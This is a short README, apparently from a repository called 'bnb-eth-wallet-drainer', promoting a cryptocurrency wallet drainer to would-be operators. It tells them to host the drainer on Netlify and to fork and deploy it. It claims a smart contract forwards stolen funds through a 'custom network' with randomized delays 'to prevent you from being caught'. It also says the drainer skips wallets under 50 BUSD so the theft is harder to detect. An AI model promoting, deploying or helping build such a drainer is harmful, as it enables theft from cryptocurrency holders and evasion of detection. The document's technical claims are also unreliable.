zeddstech/bnb-eth-wallet-drainer/README.md

 go to https://www.netlify.com/ to host or host it on a regular site

+Smart contract

+1. the smart contract will foward the data to you to prevent you from being caught

+2. the contract has a 2 hour on average delay for added security it can take up to 48 hours though its randomized

+3. The smart contract is deployed on a custom network for added security it cannot be found by the wallet address the script adds details to a custom blockchain network that will then foward it to you on the bsc network this part is copyrighted

+4. the smart contract runs from the script in your fork and is running 24/7 so you have full control

+5. If the victim has less than 50 busd in there wallet it will not drain it so its harder to detect it waits for the victim to get a certain amount of busd

 Deploy steps

 !!!!!!
 Make sure you fork it then deploy !!!!!!!